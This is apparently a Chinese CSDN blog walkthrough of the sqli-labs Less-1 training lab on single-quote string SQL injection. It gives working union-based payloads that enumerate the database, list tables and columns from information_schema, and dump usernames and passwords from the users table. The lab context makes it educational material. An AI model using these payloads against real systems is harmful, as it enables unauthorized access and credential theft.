sqli-labs/Less-1/基于单引号的字符型注入

已于 2023-04-17 18:24:55 修改
阅读量104 收藏 1
点赞数 1
文章标签: 安全 web安全
于 2023-04-16 17:18:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_75178803/article/details/130183462
版权

相关wp:

单引号字符型注入_BTY@BTY的博客-CSDN博客

SQL注入漏洞详解_boolean-based blind_yyysec的博客-CSDN博客

【Less-1】单引号报错字符型注入_less 1----基于单引号的字符型注入_多学点技术的博客-CSDN博客s
如何判断是字符型注入还是数字型注入_字符型注入和数字型注入_原味瓜子、的博客-CSDN博客
 

  • SQL 注入需要满足以下两个条件:
  1. 参数可控:从前端传给后端的参数内容是用户可以控制的
  2. 参数带入数据库查:传入的参数拼接到 SQL 语句,且带入数据库查询。

  • sql注入的两种漏洞分类
  1. 数字型
  2. 字符型

  • 手工注入思路

1.判断是否存在注入,注入是字符型还是数字型
2.猜解 SQL 查询语句中的字段数 order by x
3.确定显示的字段顺序
4.获取当前数据库
5.获取数据库中的表
6.获取表中的字段名
7.查询到账户的数据

  • 注释符:

#(单行注释 注意与 url 中的#区分)
--空格 (单行注释 注意为短线短线空格)
/*()*/ (多行注释 至少存在俩处的注入 /**/常用来作为空格)

  • 如何判断是数字型注入还是字符型注入

这里我们借用原味瓜子、的理解

 

或者用   www.xxx.com/ccc.php?id=1' and '1'='2'--+  来判断

 字符型和数字型最大的一个区别在于,数字型不需要单引号来闭合,而字符串一般需要通过单引号来闭合的。

sqli-labs 第一关

1.判断注入类型

?id=1 and 1=2 --+

页面正常,说明不是数字型注入

?id=1' and '1'='1' --+

?id=1' and '1'='2' --+    或者 ?id=1' and '1'='2

页面错误,说明是字符型注入

2.报错猜解准备(报出数据显示点以及列名字段数)

?id=1' order by 3 --+

页面正常

?id=1' order by 4 --+

页面错误,说明列名字段数为3

?id=-1' union select 1,2,3 --+

爆出显示位,就是看表格里哪一列是在页面显示的。可以看到是第二列和第三列里面的数据是显示在页面的

3.信息收集

数据库版本 version()                                    5.7.26

数据库名字 database()                                 security

数据库用户 user()                                         root@localhost

操作系统@@version_compile_os                win64

?id=-1' union select 1,version(),database() --+

?id=-1' union select 1,user(),@@version_compile_os --+

4.查询指定数据库下的表名信息

?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

5.查询指定表下的列名信息

?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+

 6.查询指定数据

?id=-1' union select 1,group_concat(username),group_concat(password) from users  --+

访白鹿
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
理论篇8:SQL注入(字符注入和数字注入)
aiojay的博客
05-02 3268
SQL注入(字符注入和数字注入),Mysql中 int(3) 类的含义,判断MYSQL注入闭合方式:
sqli-labs】Less 1——字符注入单引号
用博客做做记录的小白
06-08 124
sqli-labs靶场第一关Less1单引号字符注入
关于sql注入单引号的解决
mochenxue的博客
06-11 620
1. 这边我们采用java的String进行替换为\\",\\ 主要是用于标识这是单引号与前端传来的真正"进行区分,然后写入数据库中。2. 这里我写了一个StringUtil类进行符号的替换和解析。
sql注入——单引号注入sqli-labs-less1)
pluto_23的博客
07-22 4447
sql注入的基本步骤: 1.判断是否有注入(判断是否严格校验)——第一个要素 1)可控参数的改变能否影响页面显示结果 2)输入的sql语句是否能报错--能通过数据库的报错看到一些数据库的语句痕迹 3)输入的sql语句能否不报错——我们的语句可以成功闭合 2.判断是什么类注入 3.语句是否能够被恶意修改(如添加单引号,双引号等)——第二个要素 4.是否能够成功执行——第三个要素 5.获取我们想要的数据 数据库->表->字段->值 环境选择:sqli-l...
SQL注入攻击】Single quotes(单引号注入
sm1918451478的博客
10-20 1379
SQL注入攻击】GET-Error based-Single quotes-String(GET基于错误的单引号字符注入
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
SQL注入中绕过 单引号 限制继续注入
10-29
我想不少人都看过一些关于SQL Injection针对SQL Server攻击的文章,都是因为变量过滤不足甚至没有过滤而构造畸形SQL语句注入
Sqli-labs2-5单引号变形,双引号,双注入
Recar的博客
12-12 4308
第二题第二个就是整形的了第一个是字符串的整形与字符注入的区别!!!整形是不用单引号闭合的,不要后面注释直接 union联合查询就可以了~~ 接下来就可以继续向第一题那样测试了整不需要闭合就可以执行后面的语句,字符的则要闭合http://localhost:9096/sqli-labs/Less-2/?id=-1 union select 1,2,table_name from informat
SQL 传入特殊符号 单引号 ' 导致的问题及解决办法
小圣_fighting的博客
12-19 9203
问题描述:       今天在写项目,传入一个string到sql中,作为条件进行判断。程序报错。跟踪后发现,字符串中带有单引号。 select * from POSData where Reseller='CS Int'l Inc.'//      以上SQL的条件中,CS Int'l Inc. 是一个整串,但是其中多了单引号后,sql报错。 解决方法如下: str
SQL —— 解决单引号带来的sql注入问题
看了就会暴富的博客!
11-20 1884
问题 当使用${}写sql时,如果输入的字段中含有单引号,就会发生sql注入,改变原有的sql逻辑,应该如何处理呢? 解决 将单引号,替换为两个单引号即可。 String regexp = "\'"; str.replaceAll(regexp, "\'\'"); ...
sql 单引号_SQL注入
weixin_39526564的博客
12-06 1595
SQL注入漏洞SQL注入原理程序员在处理程序和数据库交互时,使用字符串拼接的方式构造SQL语句未对用户可控参数进行足够的过滤,便将参数内容拼接到SQL语句SQL注入漏洞的危害攻击者可以利用SQL注入漏洞,可以获取数据库中的多种信息(管理员后台账密等),从而脱去数据库的内容(脱库)。在特别的情况下还可以修改数据库的内容、插入内容到数据库或者删除数据库的内容。如果数据库权限分配存在问题,或者数据库本身...
sql注入单引号
菜鸟不会飞
04-05 2508
    在开发工具过程中,需要往数据库中写入英文,其中部分英文存在单引号,在不注意的情况下,直接写sql语句,会引起字符未进行转义而导致sql语句被终止。     单引号对很对计算机语言包括(SQL)是做字符串引用的;但是对SQL语言来说;还有另外一个作用是作引号的转义。 总结下:对sql的作用: 1、做字符串引用;例如’abc’;表示这是字符串类; 2、做引号的转义。以下为查询 sqlite’ 的语句。 SELECT ‘sqlite’’’ FROM test; 第一个单引号表示作字符串引用; 第二个
sql宽字节注入,绕过单引号
weixin_34149796的博客
08-04 1723
参加下面: http://leapar.lofter.com/post/122a03_3028a9 http://huaidan.org/archives/2268.html   https://ilia.ws/archives/103-mysql_real_escape_string-versus-Prepared-Statements.html
自动完成-SQL注入单引号
猿人奶爸的博客
11-21 2402
在做查询自动完成(Autocomplete)功能时,出现一个小bug。如下图所示:                          用微软拼音键入时,会有单引号将拼音间隔开(搜狗不会),当触发前端自动完成代码块时,会调用后台的查询语句,然而......下一秒报错: 这个错误很明显是sql语句语法错误引起的,我这里后端用的是字符串拼接方式生成sql语句,其中部分条件模糊查询语句如下: ...
sql 单引号_我对SQL注入的认知
weixin_39880318的博客
11-26 511
关于SQL注入1.什么是sql注入sql注入是一种将sql代码添加到输入参数中,传递到sql服务器解析并执行的一种攻击手段。2.sql注入原理SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。3.如何寻找注入点首先,we...
Linux安全与高级应用(四)深入探索MySQL数据库:安装、管理与安全实践
最新发布
洛秋的博客
08-07 1143
Linux:作为操作系统,提供稳定的运行环境。Apache:作为Web服务器,处理HTTP请求。MySQL:作为数据库管理系统,存储和管理数据。:作为脚本语言,生成动态网页。LAMP平台的优势在于其成本低廉、可定制性强、易于开发、方便易用且安全稳定。这使得LAMP成为许多企业和开发者的首选平台。通过以上步骤,我们完成了LAMP平台的部署及其主要组件的配置和测试。LAMP平台的搭建不仅为Web开发提供了一个强大的环境,同时也展现了其在成本和效率上的优势。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值